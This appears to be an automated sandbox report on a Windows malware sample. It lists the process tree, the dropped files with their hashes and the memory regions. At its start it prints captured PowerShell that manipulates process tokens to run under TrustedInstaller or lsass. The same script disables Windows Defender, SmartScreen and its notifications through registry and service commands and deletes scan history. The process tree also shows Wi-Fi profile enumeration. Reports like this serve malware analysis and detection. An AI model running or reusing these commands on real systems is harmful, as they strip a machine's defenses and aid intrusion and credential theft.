     1 . . 5 | % { $ k = $ _ ; $ n = 1 ; $ F [ $ _ ] | % { $ 9 = $ D [ $ k ] . " D e f ` i n e F i e l d " ( ' f ' + $ n + + , $ _ , 6 ) } } ; $ T = @ ( ) ; 0 . . 5 | % { $ T + = $ D [ $ _ ] . " C r ` e a t e T y p e " ( ) ; $ Z = [ u i n t p t r ] : : s i z e  
     n v   ( ' T ' + $ _ ) ( [ A c t i v a t o r ] : : C r e a t e I n s t a n c e ( $ T [ $ _ ] ) ) } ;   $ H = $ I . m o d u l e . G e t T y p e ( " S y s t e m . R u n t i m e . I n t e r o p ` S e r v i c e s . M a r ` s h a l " ) ;  
     $ W P = $ H . " G e t ` M e t h o d " ( " W r i t e $ J " , [ t y p e [ ] ] ( $ J , $ J ) ) ;   $ H G = $ H . " G e t ` M e t h o d " ( " A l l o c H ` G l o b a l " , [ t y p e [ ] ] ' i n t 3 2 ' ) ;   $ v = $ H G . i n v o k e ( $ n u l l , $ Z )  
     ' T r u s t e d I n s t a l l e r ' , ' l s a s s ' | % { i f ( ! $ p n ) { n e t 1   s t a r t   $ _   2 > & 1   > $ n u l l ; $ p n = [ D i a g n o s t i c s . P r o c e s s ] : : G e t P r o c e s s e s B y N a m e ( $ _ ) [ 0 ] ; } }  
     $ W P . i n v o k e ( $ n u l l , @ ( $ v , $ p n . H a n d l e ) ) ;   $ S Z = $ H . " G e t ` M e t h o d " ( " S i z e O f " , [ t y p e [ ] ] ' t y p e ' ) ;   $ T 1 . f 1 = 1 3 1 0 7 2 ;   $ T 1 . f 2 = $ Z ;   $ T 1 . f 3 = $ v ;   $ T 2 . f 1 = 1  
     $ T 2 . f 2 = 1 ; $ T 2 . f 3 = 1 ; $ T 2 . f 4 = 1 ; $ T 2 . f 6 = $ T 1 ; $ T 3 . f 1 = $ S Z . i n v o k e ( $ n u l l , $ T [ 4 ] ) ; $ T 4 . f 1 = $ T 3 ; $ T 4 . f 2 = $ H G . i n v o k e ( $ n u l l , $ S Z . i n v o k e ( $ n u l l , $ T [ 2 ] ) )  
     $ H . " G e t ` M e t h o d " ( " S t r u c t u r e T o ` P t r " , [ t y p e [ ] ] ( $ D [ 2 ] , $ J , ' b o o l e a n ' ) ) . i n v o k e ( $ n u l l , @ ( ( $ T 2 - a s   $ D [ 2 ] ) , $ T 4 . f 2 , $ f a l s e ) ) ; $ w i n d o w = 0 x 0 E 0 8 0 6 0 0  
     $ 9 = $ T [ 0 ] . " G e t ` M e t h o d " ( ' C r e a t e P r o c e s s ' ) . I n v o k e ( $ n u l l , @ ( $ n u l l , $ c m d , 0 , 0 , 0 , $ w i n d o w , 0 , $ n u l l , ( $ T 4 - a s   $ D [ 4 ] ) , ( $ T 5 - a s   $ D [ 5 ] ) ) ) ;   b r e a k  
 }  
  
 $ w d p = ' H K L M : \ S O F T W A R E \ P o l i c i e s \ M i c r o s o f t \ W i n d o w s   D e f e n d e r '  
 '   S e c u r i t y   C e n t e r \ N o t i f i c a t i o n s ' , ' \ U X   C o n f i g u r a t i o n ' , ' \ M p E n g i n e ' , ' \ S p y n e t ' , ' \ R e a l - T i m e   P r o t e c t i o n '   | %   { n i   ( $ w d p + $ _ ) - e a   0 | o u t - n u l l }  
  
 s p   ' H K L M : \ S O F T W A R E \ P o l i c i e s \ M i c r o s o f t \ W i n d o w s   D e f e n d e r   S e c u r i t y   C e n t e r \ N o t i f i c a t i o n s '   D i s a b l e N o t i f i c a t i o n s   1   - T y p e   D w o r d   - e a   0  
 s p   ' H K L M : \ S O F T W A R E \ P o l i c i e s \ M i c r o s o f t \ W i n d o w s   D e f e n d e r \ U X   C o n f i g u r a t i o n '   N o t i f i c a t i o n _ S u p p r e s s   1   - T y p e   D w o r d   - F o r c e   - e a   0  
 s p   ' H K L M : \ S O F T W A R E \ M i c r o s o f t \ W i n d o w s   D e f e n d e r   S e c u r i t y   C e n t e r \ N o t i f i c a t i o n s '   D i s a b l e N o t i f i c a t i o n s   1   - T y p e   D w o r d   - e a   0  
 s p   ' H K L M : \ S O F T W A R E \ M i c r o s o f t \ W i n d o w s   D e f e n d e r \ U X   C o n f i g u r a t i o n '   N o t i f i c a t i o n _ S u p p r e s s   1   - T y p e   D w o r d   - F o r c e   - e a   0  
 s p   ' H K L M : \ S O F T W A R E \ P o l i c i e s \ M i c r o s o f t \ W i n d o w s \ S y s t e m '   E n a b l e S m a r t S c r e e n   0   - T y p e   D w o r d   - F o r c e   - e a   0  
 s p   ' H K L M : \ S O F T W A R E \ P o l i c i e s \ M i c r o s o f t \ W i n d o w s   D e f e n d e r '   D i s a b l e A n t i S p y w a r e   1   - T y p e   D w o r d   - F o r c e   - e a   0  
 s p   ' H K L M : \ S O F T W A R E \ M i c r o s o f t \ W i n d o w s   D e f e n d e r '   D i s a b l e A n t i S p y w a r e   1   - T y p e   D w o r d   - F o r c e   - e a   0  
 n e t 1   s t o p   w i n d e f e n d  
 s c . e x e   c o n f i g   w i n d e f e n d   d e p e n d =   R p c S s - T O G G L E  
 k i l l   - N a m e   M p C m d R u n   - F o r c e   - e a   0  
 s t a r t   ( $ e n v : P r o g r a m F i l e s + ' \ W i n d o w s   D e f e n d e r \ M p C m d R u n . e x e ' )   - A r g   ' - D i s a b l e S e r v i c e '   - w i n   1  
 d e l   ( $ e n v : P r o g r a m D a t a + ' \ M i c r o s o f t \ W i n d o w s   D e f e n d e r \ S c a n s \ m p e n g i n e d b . d b ' )   - F o r c e   - e a   0                       # #   C o m m e n t e d   =   k e e p   s c a n   h i s t o r y  
 d e l   ( $ e n v : P r o g r a m D a t a + ' \ M i c r o s o f t \ W i n d o w s   D e f e n d e r \ S c a n s \ H i s t o r y \ S e r v i c e ' )   - R e c u r s e   - F o r c e   - e a   0  
 ' @   - F o r c e   - e a   0 ;   i e x ( ( g p   R e g i s t r y : : H K E Y _ U s e r s \ S - 1 - 5 - 2 1 * \ V o l a t i l e *   T o g g l e D e f e n d e r   - e a   0 ) [ 0 ] . T o g g l e D e f e n d e r )  
 # - _ - # 4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\system32\sc.exe" qc windefend5⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"5⤵
-
C:\Windows\SysWOW64\whoami.exe"C:\Windows\system32\whoami.exe" /groups5⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\net1.exe"C:\Windows\system32\net1.exe" start TrustedInstaller5⤵
-
C:\Windows\SysWOW64\net1.exe"C:\Windows\system32\net1.exe" start lsass5⤵
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\chcp.comchcp 650015⤵
-
C:\Windows\SysWOW64\netsh.exenetsh wlan show profile5⤵
-
C:\Windows\SysWOW64\findstr.exefindstr All5⤵
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid4⤵
-
C:\Windows\SysWOW64\chcp.comchcp 650015⤵
-
C:\Windows\SysWOW64\netsh.exenetsh wlan show networks mode=bssid5⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2312 -s 48124⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 2312 -ip 23121⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.logFilesize
2KB
MD5712a00a9d8164b3b6795c4e11800d2f1
SHA182952ef15a2e4e2b06cb149d3b206d11135128b5
SHA2562a3b20384f9ce1100ea1c1d3fc24b874446506c627102da75ace1e7bcac4a052
SHA512ab87d76996cf96e76f9182f72ffe16b1e014ac1ccbe2991a6cd85309622365fbf4a6e79023e616c529640f626cd3943bab9338816bf6ce6831cf5696d28ecd17
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
21KB
MD50da34e75aae7dd4d6b3086aadb644268
SHA1cc08bc635952cb66712cccbcbca3235ce5ccfe37
SHA25612ee2969e7c65829c219bd2aed1a26b6dcbdf9a25991c508f13dacd25a8a1872
SHA5126551684f37a5fc90f75e07176211d7e85bd99fed5723be6d9923a92607d2e2766e60ed735b8473ee84b7f12ee2f37213c91aa676caf2e234413380e4e9f76e95
-
C:\Users\Admin\AppData\Local\Temp\tmpB3A5.tmp.batFilesize
151B
MD5efe872352cc81bbe88312c51dffbb76c
SHA1631f6c21912479bddbeeda336f741ac63cb048a8
SHA256441dcb941b283021e4c89d62c8ec0f1f53951256a45ac7b80356bcdb9dccdc3f
SHA512012bdb5686817af9e851a248bcdf19a25c96ee366c5ba058da527720fad848d7b7965e1d4c541871d4c8ad54a455f304b49f56f60754a64c3ddfe251a5370c15
-
C:\Users\Admin\AppData\Roaming\svchost.exeFilesize
415KB
MD50ee108a8e3b9cddad2cceb2648072fe2
SHA1fce82d4a7aefd76ed3239fb6f33bbd7b6dce87a9
SHA2564672ceafd2e11ff9aa26ecbb9094aed5d1a58e995f2a93ae054f46f6f56591f7
SHA5121456febc7903ffa5c018b8c3a2ebd05278cddb9a39f792615f9dd308ef95a542fd89ebe31a709d4d36d335f9e96fbe410fc6990e4e3f9c2f4308d9e508124449
-
C:\Users\Admin\AppData\Roaming\svchost.exeFilesize
415KB
MD50ee108a8e3b9cddad2cceb2648072fe2
SHA1fce82d4a7aefd76ed3239fb6f33bbd7b6dce87a9
SHA2564672ceafd2e11ff9aa26ecbb9094aed5d1a58e995f2a93ae054f46f6f56591f7
SHA5121456febc7903ffa5c018b8c3a2ebd05278cddb9a39f792615f9dd308ef95a542fd89ebe31a709d4d36d335f9e96fbe410fc6990e4e3f9c2f4308d9e508124449
-
memory/208-141-0x0000000000000000-mapping.dmp
-
memory/968-171-0x0000000000000000-mapping.dmp
-
memory/1576-180-0x0000000000000000-mapping.dmp
-
memory/1776-165-0x0000000000000000-mapping.dmp
-
memory/2136-134-0x0000000000400000-0x000000000046C000-memory.dmpFilesize
432KB
-
memory/2136-133-0x00000000006E0000-0x0000000000715000-memory.dmpFilesize
212KB
-
memory/2136-136-0x0000000000777000-0x000000000079E000-memory.dmpFilesize
156KB
-
memory/2136-135-0x0000000004B70000-0x0000000005114000-memory.dmpFilesize
5.6MB
-
memory/2136-137-0x00000000006E0000-0x0000000000715000-memory.dmpFilesize
212KB
-
memory/2136-132-0x0000000000777000-0x000000000079E000-memory.dmpFilesize
156KB
-
memory/2192-178-0x0000000000000000-mapping.dmp
-
memory/2308-181-0x0000000000000000-mapping.dmp
-
memory/2312-148-0x0000000005F20000-0x0000000005FBC000-memory.dmpFilesize
624KB
-
memory/2312-146-0x000000000081B000-0x0000000000842000-memory.dmpFilesize
156KB
-
memory/2312-151-0x00000000071A0000-0x00000000071BE000-memory.dmpFilesize
120KB
-
memory/2312-149-0x0000000006340000-0x00000000063A6000-memory.dmpFilesize
408KB
-
memory/2312-150-0x0000000007100000-0x0000000007176000-memory.dmpFilesize
472KB
-
memory/2312-176-0x0000000007A40000-0x0000000007A4A000-memory.dmpFilesize
40KB
-
memory/2312-175-0x00000000075D0000-0x0000000007662000-memory.dmpFilesize
584KB
-
memory/2312-147-0x0000000000400000-0x000000000046C000-memory.dmpFilesize
432KB
-
memory/2312-143-0x0000000000000000-mapping.dmp
-
memory/2392-164-0x0000000000000000-mapping.dmp
-
memory/2924-177-0x0000000000000000-mapping.dmp
-
memory/3124-162-0x0000000000000000-mapping.dmp
-
memory/3144-179-0x0000000000000000-mapping.dmp
-
memory/3188-167-0x0000000000000000-mapping.dmp
-
memory/3432-182-0x0000000000000000-mapping.dmp
-
memory/3456-163-0x0000000000000000-mapping.dmp
-
memory/3476-138-0x0000000000000000-mapping.dmp
-
memory/3496-173-0x0000000000000000-mapping.dmp
-
memory/3584-158-0x0000000007AC0000-0x000000000813A000-memory.dmpFilesize
6.5MB
-
memory/3584-152-0x0000000000000000-mapping.dmp
-
memory/3584-161-0x0000000007440000-0x0000000007462000-memory.dmpFilesize
136KB
-
memory/3584-153-0x00000000029A0000-0x00000000029D6000-memory.dmpFilesize
216KB
-
memory/3584-160-0x00000000074E0000-0x0000000007576000-memory.dmpFilesize
600KB
-
memory/3584-154-0x0000000005530000-0x0000000005B58000-memory.dmpFilesize
6.2MB
-
memory/3584-159-0x0000000007370000-0x000000000738A000-memory.dmpFilesize
104KB
-
memory/3584-155-0x00000000054E0000-0x0000000005502000-memory.dmpFilesize
136KB
-
memory/3584-157-0x00000000062B0000-0x00000000062CE000-memory.dmpFilesize
120KB
-
memory/3584-156-0x0000000005D00000-0x0000000005D66000-memory.dmpFilesize
408KB
-
memory/3744-174-0x0000000000000000-mapping.dmp
-
memory/4004-170-0x0000000000000000-mapping.dmp
-
memory/4048-166-0x0000000000000000-mapping.dmp
-
memory/4436-172-0x0000000000000000-mapping.dmp
-
memory/4548-183-0x0000000000000000-mapping.dmp
-
memory/4608-142-0x0000000000000000-mapping.dmp
-
memory/5036-139-0x0000000000000000-mapping.dmp